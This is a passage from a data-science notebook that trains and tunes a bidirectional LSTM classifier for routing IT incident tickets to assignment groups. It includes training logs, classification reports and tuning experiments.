6792/6792 [==============================] - 102s 15ms/sample - loss: 0.9904 - accuracy: 0.6942 - val_loss: 1.4429 - val_accuracy: 0.6192
In [0]:
model.load_weights(output_dir+"/weights.14.hdf5")    # saving the weights 
In [0]:
y_pred = model.predict(X_test)

Accuracy of the model

In [0]:
acc_test =model.evaluate(X_test,y_test)
print("Test Accuracy:",acc_test[1])

acc_train =model.evaluate(X_train,y_train)
print("Train Accuracy:",acc_train[1])
1699/1699 [==============================] - 5s 3ms/sample - loss: 1.4391 - accuracy: 0.6204
Test Accuracy: 0.6203649
6792/6792 [==============================] - 21s 3ms/sample - loss: 0.8996 - accuracy: 0.7192
Train Accuracy: 0.7192285

Plot the Accuracy of the classifier

In [0]:
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()

Plot the Loss of the Classifier

In [0]:
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()

Confusion Matrix
A confusion matrix is a technique for summarizing the performance of a classification algorithm.Calculating a confusion matrix can give you a better idea of what your classification model is getting right and what types of errors it is making. The number of correct and incorrect predictions are summarized with count values and broken down by each class. This is the key to the confusion matrix.The confusion matrix shows the ways in which your classification model is confused when it makes predictions.It gives you insight not only into the errors being made by your classifier but more importantly the types of errors that are being made.

In [0]:
conf_mat = confusion_matrix(y_test.argmax(axis=1), y_pred.argmax(axis=1))  
#fig, ax = plt.subplots(figsize=(20,20))
plt.figure(figsize=(22,22))
sns.heatmap(conf_mat, annot=True, fmt='d',
            xticklabels=tickets_corpus['Assignment group'].unique(), yticklabels=tickets_corpus['Assignment group'].unique())
plt.ylabel('Actual')
plt.xlabel('Predicted')
plt.show()

The diagonal elements represent the number of points for which the predicted label is equal to the true label, while off-diagonal elements are those that are mislabeled by the classifier. The higher the diagonal values of the confusion matrix the better, indicating many correct predictions.

Many Assignment groups are not present in the test data. The diagonal element value for GRP_0 is high

Classification Reports

In [0]:
print('Classification report:\n %s' % (classification_report(y_test.argmax(axis=1), y_pred.argmax(axis=1))))
Classification report:
               precision    recall  f1-score   support

           0       0.73      0.91      0.81       781
           1       0.00      0.00      0.00         6
           2       0.25      0.15      0.19        26
           3       0.00      0.00      0.00        11
           4       0.61      0.47      0.53        57
           5       0.41      0.27      0.33        33
           6       0.45      0.38      0.42        26
           7       0.38      0.23      0.29        13
           8       0.14      0.11      0.12        19
           9       1.00      1.00      1.00        15
          10       0.36      0.42      0.38        12
          11       0.41      0.18      0.25        39
          12       0.51      0.45      0.48        56
          13       0.00      0.00      0.00         9
          14       0.00      0.00      0.00         4
          15       0.17      0.20      0.18         5
          16       0.60      0.60      0.60         5
          17       0.87      0.69      0.77        67
          18       0.21      0.21      0.21        19
          19       0.12      0.11      0.12         9
          20       0.00      0.00      0.00         3
          21       0.00      0.00      0.00        11
          22       0.27      0.35      0.31        17
          23       0.39      0.35      0.37        34
          24       0.26      0.71      0.38         7
          25       0.33      0.09      0.14        11
          26       0.00      0.00      0.00         1
          27       0.44      0.30      0.36        23
          28       0.50      0.14      0.22        14
          30       0.00      0.00      0.00         3
          31       0.00      0.00      0.00         3
          33       0.00      0.00      0.00         6
          34       0.55      0.25      0.34        24
          35       0.38      0.27      0.32        11
          36       0.55      0.60      0.57        10
          37       0.00      0.00      0.00         7
          38       0.00      0.00      0.00         3
          39       0.00      0.00      0.00         3
          40       0.00      0.00      0.00         8
          41       0.00      0.00      0.00         1
          42       0.00      0.00      0.00         4
          43       0.00      0.00      0.00         3
          45       0.00      0.00      0.00        23
          46       0.00      0.00      0.00         3
          47       0.00      0.00      0.00         1
          48       0.00      0.00      0.00         3
          49       0.00      0.00      0.00         2
          51       0.00      0.00      0.00         1
          53       0.00      0.00      0.00         1
          54       0.00      0.00      0.00         1
          55       0.00      0.00      0.00         2
          56       0.43      0.21      0.28        29
          57       0.00      0.00      0.00         6
          58       0.00      0.00      0.00         1
          59       0.00      0.00      0.00         3
          62       0.00      0.00      0.00         1
          63       0.00      0.00      0.00         1
          66       0.00      0.00      0.00         1
          67       1.00      0.12      0.21        17
          70       0.00      0.00      0.00         1
          71       0.00      0.00      0.00         1
          72       0.62      0.67      0.64       144
          73       0.25      0.74      0.37        38

    accuracy                           0.62      1699
   macro avg       0.21      0.18      0.18      1699
weighted avg       0.57      0.62      0.58      1699

/Users/rishinarang/anaconda3/lib/python3.7/site-packages/sklearn/metrics/_classification.py:1272: UndefinedMetricWarning:

Precision and F-score are ill-defined and being set to 0.0 in labels with no predicted samples. Use `zero_division` parameter to control this behavior.

Evaluation comparison of the above classifier models:

Out of all the models we've tried, Support Vector Machine and RandomForestClassifier are performing better than all others. But these models are highly overfitted and one of the obvious reason was the dataset was highly imbalanced.

The Accuracy of the Models:


| Algorithm               | Train_Accuracy   | Test_accuracy  |
|-------------------------|------------------|----------------|
| Multinomail NB          |  62.52           |  61.28         | 
--------------------------|------------------|----------------|
| K Nearest Neighbours    |  66.87           |  64.67         | 
--------------------------|------------------|----------------|
| Support Vector Machine  |  91.32           |  67.73         | 
--------------------------|------------------|----------------|
| Decision Tree Classifier|  63.27           |  50.82         | 
--------------------------|------------------|----------------|
| RandomForest Classifier |  84.22           |  64.48         | 
--------------------------|------------------|----------------|
| Bidirectional LSTM      |  75.10           |  63.39         | 
--------------------------|------------------|----------------|

LSTM is efficient of dealing with textual data. Bidirectional LSTMs are an extension of traditional LSTMs that can improve model performance on classification problems.Using bidirectional will run your inputs in two ways, one from past to future and one from future to past and what differs this approach from unidirectional is that in the LSTM that runs backwards you preserve information from the future and using the two hidden states combined you are able in any point in time to preserve information from both past and future.
We can try improving the performance of the above LSTM model by tuning the hyperparameters,and checking other possible refinements.

Testing the BLSTM Model for a new ticket!

Let's test the model for a new incident ticket which is not present in our train and test datasets and find out how the model predict the assignment group for same.

In [0]:
ticket = ['caller confirmed that he was able to login, checked the user name in ad and reset the password']
#vectorizing the tweet by the pre-fitted tokenizer instance
ticket = tokenizer.texts_to_sequences(ticket)
#padding the tweet to have exactly the same shape as `embedding_2` input
ticket = pad_sequences(ticket, maxlen=maxlen, value=0.0, padding='post')
print("Ticket :",ticket)
output = model.predict(ticket)
print("Output:",output)
Ticket : [[  843 10262    20  3450     8   560     6     2     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0
      0     0     0     0     0     0     0     0     0     0     0     0]]
Output: [[9.53907251e-01 4.60357332e-05 6.40979260e-06 3.01209866e-06
  3.46778397e-04 2.13436342e-05 8.33321246e-05 9.07403376e-07
  6.52152958e-05 5.78593230e-04 1.65806250e-05 5.27238299e-04
  5.50375646e-03 5.40763858e-06 1.85037046e-04 1.11878571e-05
  1.53851463e-04 3.88056424e-06 1.61757052e-04 1.81320400e-04
  3.96019220e-03 3.32635420e-04 1.33011736e-05 4.38311690e-04
  2.20787733e-05 5.51054429e-04 3.32552486e-06 1.13005641e-04
  1.40615995e-03 1.66226928e-05 2.08499565e-04 1.33392692e-03
  4.29117426e-05 4.17461888e-05 6.20687846e-04 8.31907437e-06
  1.20409219e-04 2.47880380e-05 7.29075982e-05 3.56669034e-07
  6.29656779e-06 1.51614620e-06 3.42196449e-06 1.02729209e-05
  2.06260702e-05 1.79369863e-06 1.31915906e-04 8.17160890e-06
  1.20041113e-05 7.34491274e-04 1.09017186e-07 5.36735752e-06
  2.81715415e-06 3.75717445e-06 4.47803700e-07 3.51519375e-05
  1.74986909e-07 3.65943633e-05 2.58497977e-07 5.33238126e-05
  1.11400375e-04 1.97282770e-06 4.24557948e-05 1.06377820e-05
  1.78343626e-07 1.14216562e-07 1.32131399e-05 2.75086146e-02
  1.40636848e-06 1.32235016e-07 3.88262815e-05 8.38044372e-08
  3.81155696e-05 2.41828548e-05]]
In [0]:
def decode(datum):
    return np.argmax(datum)
In [0]:
decoded_Y = []
print("****************************************")
for i in range(output.shape[0]):
    datum = output[i]
    #print('index: %d' % i)
    #print('encoded datum: %s' % datum)
    decoded_datum = decode(output[i])
    #print('decoded datum: %s' % decoded_datum)
    decoded_Y.append(tickets_corpus['Assignment group'][decoded_datum])
    
print("Decoded_y:" , decoded_Y)
****************************************
Decoded_y: ['GRP_0']

The model has predicted the incident ticket assignment group as GRP_0.

Saving the data to a CSV file.

In [0]:
#saving the data to a CSV file.
file_name='preprocessed_input_data.csv'
tickets_corpus.to_csv(file_name,encoding='utf-8',index=False)

#To delimit by a tab you can use the 'sep' argument
#When you are storing a DataFrame object into a csv file using the to_csv method, 
#no need to store the preceding indices of each row of the DataFrame object so passing a False boolean value to index parameter.

Milestone 3

Tuning of LSTM Model!

1. LSTM Merge Mode

The Bidirectional wrapper layer also allows to specify the merge mode, that is how the forward and backward outputs should be combined before being passed on to the next layer.

The options are:
'sum': The outputs are added together.
'mul': The outputs are multiplied together.
'concat': The outputs are concatenated together (the default), providing double the number of outputs to the next layer.
'ave': The average of the outputs is taken.

'concat'is the default merge mode. Merge mode 'mul' and 'ave' didn't show any improvements in F1 score. However merge mode of 'sum' showed improved F1 score.

Look the following results with 17 epochs.

Fit an LSTM model with merge_mode="sum"

In [0]:
model = Sequential()
model.add(Embedding(input_dim=num_words, 
                        output_dim=embedding_size, 
                        weights=[embedding_matrix], 
                        input_length=maxlen, 
#                       mask_zero=True,
                        trainable=False))
model.add(SpatialDropout1D(0.2))
model.add(Bidirectional(LSTM(100, dropout=0.2, recurrent_dropout=0.2), merge_mode="sum"))
model.add(Dense(100, activation='relu'))
model.add(Dropout(0.1))
model.add(Dense(74, activation='softmax'))
In [0]:
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
In [0]:
history_mode_sum = model.fit(X_train, 
                    y_train, 
                    epochs=17, 
                    batch_size=batch_size,
                    validation_data=(X_test, y_test),
                    callbacks=[EarlyStopping(monitor='val_loss', patience=3, min_delta=0.0001)])
Train on 6792 samples, validate on 1699 samples
Epoch 1/17
6792/6792 [==============================] - 110s 16ms/sample - loss: 2.4467 - accuracy: 0.5041 - val_loss: 1.9681 - val_accuracy: 0.5509
Epoch 2/17
6792/6792 [==============================] - 103s 15ms/sample - loss: 1.8520 - accuracy: 0.5542 - val_loss: 1.7610 - val_accuracy: 0.5756
Epoch 3/17
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.7062 - accuracy: 0.5713 - val_loss: 1.6606 - val_accuracy: 0.5992
Epoch 4/17
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.5954 - accuracy: 0.5901 - val_loss: 1.5806 - val_accuracy: 0.6015
Epoch 5/17
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.5254 - accuracy: 0.5964 - val_loss: 1.5485 - val_accuracy: 0.6162
Epoch 6/17
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.4572 - accuracy: 0.6084 - val_loss: 1.5317 - val_accuracy: 0.6104
Epoch 7/17
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.4011 - accuracy: 0.6143 - val_loss: 1.4829 - val_accuracy: 0.6092
Epoch 8/17
6792/6792 [==============================] - 103s 15ms/sample - loss: 1.3531 - accuracy: 0.6244 - val_loss: 1.4736 - val_accuracy: 0.6186
Epoch 9/17
6792/6792 [==============================] - 103s 15ms/sample - loss: 1.3081 - accuracy: 0.6360 - val_loss: 1.4628 - val_accuracy: 0.6257
Epoch 10/17
6792/6792 [==============================] - 102s 15ms/sample - loss: 1.2625 - accuracy: 0.6403 - val_loss: 1.4267 - val_accuracy: 0.6245
Epoch 11/17
6792/6792 [==============================] - 103s 15ms/sample - loss: 1.2250 - accuracy: 0.6436 - val_loss: 1.4276 - val_accuracy: 0.6310
Epoch 12/17
6792/6792 [==============================] - 103s 15ms/sample - loss: 1.1787 - accuracy: 0.6605 - val_loss: 1.4191 - val_accuracy: 0.6321
Epoch 13/17
6792/6792 [==============================] - 102s 15ms/sample - loss: 1.1458 - accuracy: 0.6699 - val_loss: 1.4080 - val_accuracy: 0.6298
Epoch 14/17
6792/6792 [==============================] - 102s 15ms/sample - loss: 1.1066 - accuracy: 0.6733 - val_loss: 1.3951 - val_accuracy: 0.6321
Epoch 15/17
6792/6792 [==============================] - 102s 15ms/sample - loss: 1.0716 - accuracy: 0.6842 - val_loss: 1.4143 - val_accuracy: 0.6333
Epoch 16/17
6792/6792 [==============================] - 102s 15ms/sample - loss: 1.0459 - accuracy: 0.6885 - val_loss: 1.4166 - val_accuracy: 0.6421
Epoch 17/17
6792/6792 [==============================] - 102s 15ms/sample - loss: 1.0084 - accuracy: 0.6968 - val_loss: 1.4294 - val_accuracy: 0.6339
Plot the Accuracy of the classifier
In [0]:
plt.plot(history_mode_sum.history['accuracy'])
plt.plot(history_mode_sum.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()

Plot the Loss of the Classifier

In [0]:
plt.plot(history_mode_sum.history['loss'])
plt.plot(history_mode_sum.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
In [0]:
y_pred_mode_sum = model.predict(X_test)
Accuracy of the model when merge mode is sum
In [0]:
acc_test =model.evaluate(X_test,y_test)
print("Test Accuracy:",acc_test[1])

acc_train =model.evaluate(X_train,y_train)
print("Train Accuracy:",acc_train[1])
1699/1699 [==============================] - 5s 3ms/sample - loss: 1.4294 - accuracy: 0.6339
Test Accuracy: 0.6339023
6792/6792 [==============================] - 20s 3ms/sample - loss: 0.7949 - accuracy: 0.7571
Train Accuracy: 0.75706714
Classification Reports
In [0]:
print('Classification report:\n %s' % (classification_report(y_test.argmax(axis=1), y_pred_mode_sum.argmax(axis=1))))
Classification report:
               precision    recall  f1-score   support

           0       0.78      0.89      0.83       781
           1       0.00      0.00      0.00         6
           2       0.40      0.15      0.22        26
           3       0.50      0.18      0.27        11
           4       0.54      0.58      0.56        57
           5       0.29      0.42      0.34        33
           6       0.42      0.50      0.46        26
           7       0.60      0.23      0.33        13
           8       0.50      0.16      0.24        19
           9       1.00      1.00      1.00        15
          10       0.36      0.33      0.35        12
          11       0.27      0.15      0.20        39
          12       0.53      0.32      0.40        56
          13       0.00      0.00      0.00         9
          14       0.00      0.00      0.00         4
          15       0.20      0.20      0.20         5
          16       0.50      0.60      0.55         5
          17       0.79      0.81      0.80        67
          18       0.26      0.32      0.29        19
          19       0.22      0.22      0.22         9
          20       0.00      0.00      0.00         3
          21       0.00      0.00      0.00        11
          22       0.46      0.35      0.40        17
          23       0.25      0.41      0.31        34
          24       0.33      0.14      0.20         7
          25       0.33      0.09      0.14        11
          26       0.00      0.00      0.00         1
          27       0.32      0.35      0.33        23
          28       0.22      0.14      0.17        14
          30       0.00      0.00      0.00         3
          31       0.00      0.00      0.00         3
          33       0.25      0.17      0.20         6
          34       0.67      0.25      0.36        24
          35       0.31      0.36      0.33        11
          36       0.58      0.70      0.64        10
          37       0.00      0.00      0.00         7
          38       0.00      0.00      0.00         3
          39       0.00      0.00      0.00         3
          40       0.00      0.00      0.00         8
          41       0.00      0.00      0.00         1
          42       0.00      0.00      0.00         4
          43       0.21      1.00      0.35         3
          45       0.50      0.04      0.08        23
          46       1.00      0.33      0.50         3
          47       0.00      0.00      0.00         1
          48       0.00      0.00      0.00         3
          49       0.00      0.00      0.00         2
          51       0.00      0.00      0.00         1
          53       0.00      0.00      0.00         1
          54       0.00      0.00      0.00         1
          55       0.00      0.00      0.00         2
          56       0.45      0.17      0.25        29
          57       0.00      0.00      0.00         6
          58       0.00      0.00      0.00         1
          59       0.00      0.00      0.00         3
          62       0.00      0.00      0.00         1
          63       0.00      0.00      0.00         1
          66       0.00      0.00      0.00         1
          67       0.75      0.35      0.48        17
          70       0.00      0.00      0.00         1
          71       0.00      0.00      0.00         1
          72       0.56      0.89      0.68       144
          73       0.36      0.26      0.30        38

    accuracy                           0.63      1699
   macro avg       0.25      0.21      0.21      1699
weighted avg       0.59      0.63      0.60      1699

Observations (When compared to the original model created in Milestone 2)

With LSTM merge mode SUM, Test accuracy has improved to 63%, however training accuracy improved to 75%. The average F1 Score of the model is 0.60. We can go ahead with SUM.

2.Number of LSTM Cells

We cannot know the best number of memory cells for a given LSTM architecture. We must test a suite of different memory cells in LSTM hidden layers to see what works best. Let's take 3 different numbers of LSTM cells, 50, 100 and 200.

In [0]:
epochs_lstm_cells = 2
params = [50, 100, 200]
n_repeats = 2
In [0]:
# fit an LSTM model
def fit_model(n_cells):
    # define model
    model_lstm_cells = Sequential()
    model_lstm_cells.add(Embedding(input_dim=num_words, 
                            output_dim=embedding_size, 
                            weights=[embedding_matrix], 
                            input_length=maxlen, 
                            trainable=False))
    model_lstm_cells.add(SpatialDropout1D(0.2))
    model_lstm_cells.add(Bidirectional(LSTM(n_cells, dropout=0.2, recurrent_dropout=0.2), merge_mode="sum"))
    model_lstm_cells.add(Dense(100, activation='relu'))
    model_lstm_cells.add(Dropout(0.1))
    model_lstm_cells.add(Dense(74, activation='softmax'))
    # compile model
    model_lstm_cells.compile(loss='mse', optimizer='adam')
    # fit model
    #X_train, X_test, y_train, y_test
    model_lstm_cells.fit(X_train, 
                        y_train, 
                        epochs=epochs_lstm_cells, 
                        batch_size=batch_size,
                        validation_data=(X_test, y_test),
                        callbacks=[EarlyStopping(monitor='val_loss', patience=3, min_delta=0.0001)])
    # evaluate model
    loss = model_lstm_cells.evaluate(X_test, y_test, verbose=0)
    return loss
In [0]:
# grid search parameter values
scores = DataFrame()
for value in params:
    # repeat each experiment multiple times
    loss_values = list()
    for i in range(n_repeats):
        loss = fit_model(value)
        loss_values.append(loss)
        print('>%d/%d param=%f, loss=%f' % (i+1, n_repeats, value, loss))
    # store results for this parameter
    scores[str(value)] = loss_values
# summary statistics of results
print(scores.describe())
# box and whisker plot of results
scores.boxplot()
pyplot.show()
Train on 6792 samples, validate on 1699 samples
Epoch 1/2
6792/6792 [==============================] - 89s 13ms/sample - loss: 0.0102 - val_loss: 0.0089
Epoch 2/2
6792/6792 [==============================] - 82s 12ms/sample - loss: 0.0086 - val_loss: 0.0082
>1/2 param=50.000000, loss=0.008246
Train on 6792 samples, validate on 1699 samples
Epoch 1/2
6792/6792 [==============================] - 90s 13ms/sample - loss: 0.0103 - val_loss: 0.0089
Epoch 2/2
6792/6792 [==============================] - 82s 12ms/sample - loss: 0.0085 - val_loss: 0.0082
>2/2 param=50.000000, loss=0.008216
Train on 6792 samples, validate on 1699 samples
Epoch 1/2
6792/6792 [==============================] - 108s 16ms/sample - loss: 0.0100 - val_loss: 0.0087
Epoch 2/2
6792/6792 [==============================] - 103s 15ms/sample - loss: 0.0084 - val_loss: 0.0081
>1/2 param=100.000000, loss=0.008120
Train on 6792 samples, validate on 1699 samples
Epoch 1/2
6792/6792 [==============================] - 110s 16ms/sample - loss: 0.0099 - val_loss: 0.0087
Epoch 2/2
6792/6792 [==============================] - 103s 15ms/sample - loss: 0.0084 - val_loss: 0.0081
>2/2 param=100.000000, loss=0.008124
Train on 6792 samples, validate on 1699 samples
Epoch 1/2
6792/6792 [==============================] - 266s 39ms/sample - loss: 0.0096 - val_loss: 0.0086
Epoch 2/2
6792/6792 [==============================] - 265s 39ms/sample - loss: 0.0083 - val_loss: 0.0080
>1/2 param=200.000000, loss=0.007955
Train on 6792 samples, validate on 1699 samples
Epoch 1/2
6792/6792 [==============================] - 268s 40ms/sample - loss: 0.0097 - val_loss: 0.0085
Epoch 2/2
6792/6792 [==============================] - 269s 40ms/sample - loss: 0.0083 - val_loss: 0.0080
>2/2 param=200.000000, loss=0.007996
             50       100       200
count  2.000000  2.000000  2.000000
mean   0.008231  0.008122  0.007975
std    0.000022  0.000003  0.000029
min    0.008216  0.008120  0.007955
25%    0.008223  0.008121  0.007965
50%    0.008231  0.008122  0.007975
75%    0.008239  0.008123  0.007986
max    0.008246  0.008124  0.007996

Observations (When compared to the original model created in Milestone 2)

By Increasing the number of LSTM cells from 100 to 200 we can see the reduction in overall loss.

3. Regularization

LSTMs can quickly converge and even overfit on some sequence prediction problems. To counter this, regularization methods can be used. LSTMs supports regularization such as weight regularization that imposes pressure to decrease the size of network weights. Again, these can be set on the LSTM layer with the arguments.

In [0]:
model_regularized = Sequential()
model_regularized.add(Embedding(input_dim=num_words, 
                        output_dim=embedding_size, 
                        weights=[embedding_matrix], 
                        input_length=maxlen, 
                        trainable=False))
model_regularized.add(SpatialDropout1D(0.2))
model_regularized.add(Bidirectional(LSTM(100, dropout=0.2, recurrent_dropout=0.2), merge_mode="sum"))
model_regularized.add(Dense(100, activation='relu', kernel_regularizer=tf.keras.regularizers.l1(0.01),
                activity_regularizer=tf.keras.regularizers.l2(0.01)))
model_regularized.add(Dropout(0.1))
model_regularized.add(Dense(74, activation='softmax'))
Using TensorFlow backend.
In [0]:
model_regularized.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
In [0]:
history_regularized = model_regularized.fit(X_train, 
                    y_train, 
                    epochs=epochs, 
                    batch_size=batch_size,
                    validation_data=(X_test, y_test),
                    callbacks=[EarlyStopping(monitor='val_loss', patience=3, min_delta=0.0001)])
Train on 6792 samples, validate on 1699 samples
Epoch 1/20
6792/6792 [==============================] - 114s 17ms/sample - loss: 7.4918 - accuracy: 0.4822 - val_loss: 4.0292 - val_accuracy: 0.5274
Epoch 2/20
6792/6792 [==============================] - 110s 16ms/sample - loss: 2.9540 - accuracy: 0.5308 - val_loss: 2.5158 - val_accuracy: 0.5291
Epoch 3/20
6792/6792 [==============================] - 108s 16ms/sample - loss: 2.3976 - accuracy: 0.5392 - val_loss: 2.3297 - val_accuracy: 0.5450
Epoch 4/20
6792/6792 [==============================] - 107s 16ms/sample - loss: 2.2666 - accuracy: 0.5512 - val_loss: 2.2520 - val_accuracy: 0.5568
Epoch 5/20
6792/6792 [==============================] - 106s 16ms/sample - loss: 2.1797 - accuracy: 0.5536 - val_loss: 2.1739 - val_accuracy: 0.5603
Epoch 6/20
6792/6792 [==============================] - 107s 16ms/sample - loss: 2.1219 - accuracy: 0.5576 - val_loss: 2.1361 - val_accuracy: 0.5644
Epoch 7/20
6792/6792 [==============================] - 107s 16ms/sample - loss: 2.0754 - accuracy: 0.5633 - val_loss: 2.0791 - val_accuracy: 0.5715
Epoch 8/20
6792/6792 [==============================] - 107s 16ms/sample - loss: 2.0274 - accuracy: 0.5670 - val_loss: 2.0379 - val_accuracy: 0.5739
Epoch 9/20
6792/6792 [==============================] - 106s 16ms/sample - loss: 1.9846 - accuracy: 0.5708 - val_loss: 2.0240 - val_accuracy: 0.5768
Epoch 10/20
6792/6792 [==============================] - 105s 16ms/sample - loss: 1.9594 - accuracy: 0.5752 - val_loss: 1.9990 - val_accuracy: 0.5803
Epoch 11/20
6792/6792 [==============================] - 105s 15ms/sample - loss: 1.9288 - accuracy: 0.5785 - val_loss: 1.9724 - val_accuracy: 0.5786
Epoch 12/20
6792/6792 [==============================] - 105s 16ms/sample - loss: 1.8968 - accuracy: 0.5777 - val_loss: 1.9639 - val_accuracy: 0.5803
Epoch 13/20
6792/6792 [==============================] - 105s 15ms/sample - loss: 1.8732 - accuracy: 0.5819 - val_loss: 1.9337 - val_accuracy: 0.5809
Epoch 14/20
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.8437 - accuracy: 0.5875 - val_loss: 1.9346 - val_accuracy: 0.5833
Epoch 15/20
6792/6792 [==============================] - 105s 15ms/sample - loss: 1.8204 - accuracy: 0.5882 - val_loss: 1.9106 - val_accuracy: 0.5815
Epoch 16/20
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.7917 - accuracy: 0.5891 - val_loss: 1.9275 - val_accuracy: 0.5845
Epoch 17/20
6792/6792 [==============================] - 104s 15ms/sample - loss: 1.7836 - accuracy: 0.5932 - val_loss: 1.9010 - val_accuracy: 0.5892
Epoch 18/20
6792/6792 [==============================] - 105s 15ms/sample - loss: 1.7620 - accuracy: 0.5947 - val_loss: 1.8869 - val_accuracy: 0.5839
Epoch 19/20
6792/6792 [==============================] - 105s 15ms/sample - loss: 1.7516 - accuracy: 0.5963 - val_loss: 1.8921 - val_accuracy: 0.5951
Epoch 20/20
6792/6792 [==============================] - 105s 16ms/sample - loss: 1.7459 - accuracy: 0.6022 - val_loss: 1.8831 - val_accuracy: 0.6033
Plot the Accuracy of the classifier
In [0]:
plt.plot(history_regularized.history['accuracy'])
plt.plot(history_regularized.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
Plot the Loss of the Classifier
In [0]:
plt.plot(history_regularized.history['loss'])
plt.plot(history_regularized.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
In [0]:
y_pred_regularized = model_regularized.predict(X_test)
In [0]:
acc_test_regularized =model_regularized.evaluate(X_test,y_test)
print("Test Accuracy:",acc_test_regularized[1])

acc_train_regularized =model.evaluate(X_train,y_train)
print("Train Accuracy:",acc_train_regularized[1])
1699/1699 [==============================] - 5s 3ms/sample - loss: 1.8831 - accuracy: 0.6033
Test Accuracy: 0.60329604
6792/6792 [==============================] - 20s 3ms/sample - loss: 0.7949 - accuracy: 0.7571
Train Accuracy: 0.75706714
In [0]:
print('Classification report:\n %s' % (classification_report(y_test.argmax(axis=1), y_pred_regularized.argmax(axis=1))))
Classification report:
               precision    recall  f1-score   support

           0       0.69      0.96      0.80       781
           1       0.00      0.00      0.00         6
           2       0.00      0.00      0.00        26
           3       0.00      0.00      0.00        11
           4       0.37      0.65      0.47        57
           5       0.19      0.61      0.29        33
           6       0.00      0.00      0.00        26
           7       0.00      0.00      0.00        13
           8       0.00      0.00      0.00        19
           9       1.00      1.00      1.00        15
          10       0.00      0.00      0.00        12
          11       0.80      0.10      0.18        39
          12       0.19      0.29      0.23        56
          13       0.00      0.00      0.00         9
          14       0.00      0.00      0.00         4
          15       0.00      0.00      0.00         5
          16       0.00      0.00      0.00         5
          17       0.75      0.82      0.79        67
          18       0.00      0.00      0.00        19
          19       0.00      0.00      0.00         9
          20       0.00      0.00      0.00         3
          21       0.00      0.00      0.00        11
          22       0.00      0.00      0.00        17
          23       0.43      0.09      0.15        34
          24       0.00      0.00      0.00         7
          25       0.00      0.00      0.00        11
          26       0.00      0.00      0.00         1
          27       0.00      0.00      0.00        23
          28       0.00      0.00      0.00        14
          30       0.00      0.00      0.00         3
          31       0.00      0.00      0.00         3
          33       0.00      0.00      0.00         6
          34       0.00      0.00      0.00        24
          35       0.00      0.00      0.00        11
          36       0.00      0.00      0.00        10
          37       0.00      0.00      0.00         7
          38       0.00      0.00      0.00         3
          39       0.00      0.00      0.00         3
          40       0.00      0.00      0.00         8
          41       0.00      0.00      0.00         1
          42       0.00      0.00      0.00         4
          43       0.00      0.00      0.00         3
          45       0.00      0.00      0.00        23
          46       0.00      0.00      0.00         3
          47       0.00      0.00      0.00         1
          48       0.00      0.00      0.00         3
          49       0.00      0.00      0.00         2
          51       0.00      0.00      0.00         1
          53       0.00      0.00      0.00         1
          54       0.00      0.00      0.00         1
          55       0.00      0.00      0.00         2
          56       0.00      0.00      0.00        29
          57       0.00      0.00      0.00         6
          58       0.00      0.00      0.00         1
          59       0.00      0.00      0.00         3
          62       0.00      0.00      0.00         1
          63       0.00      0.00      0.00         1
          66       0.00      0.00      0.00         1
          67       0.00      0.00      0.00        17
          70       0.00      0.00      0.00         1
          71       0.00      0.00      0.00         1
          72       0.56      0.88      0.68       144
          73       0.00      0.00      0.00        38

    accuracy                           0.60      1699
   macro avg       0.08      0.09      0.07      1699
weighted avg       0.45      0.60      0.50      1699

Observations:

By adding regualarization on Dense layer using kernel_regularizer and activity_regularizer, no improvement is seen on train and validation data. F1 score dropped from 0.60 to 0.50 may be because of less data related to other categories.

4. Weight Initialization

The Keras LSTM layer uses the glorot uniform weight initialization by default. This weight initialization works well in general.

Lets try normal type weight initialization with LSTMs and see if we can get better results.

In [0]:
initializer = tf.keras.initializers.GlorotNormal()
In [0]:
model_normalized = Sequential()
model_normalized.add(Embedding(input_dim=num_words, 
                        output_dim=embedding_size, 
                        weights=[embedding_matrix], 
                        input_length=maxlen, 
#                       mask_zero=True,
                        trainable=False))
model_normalized.add(SpatialDropout1D(0.2))
model_normalized.add(Bidirectional(LSTM(100, dropout=0.2, recurrent_dropout=0.2), merge_mode="sum"))
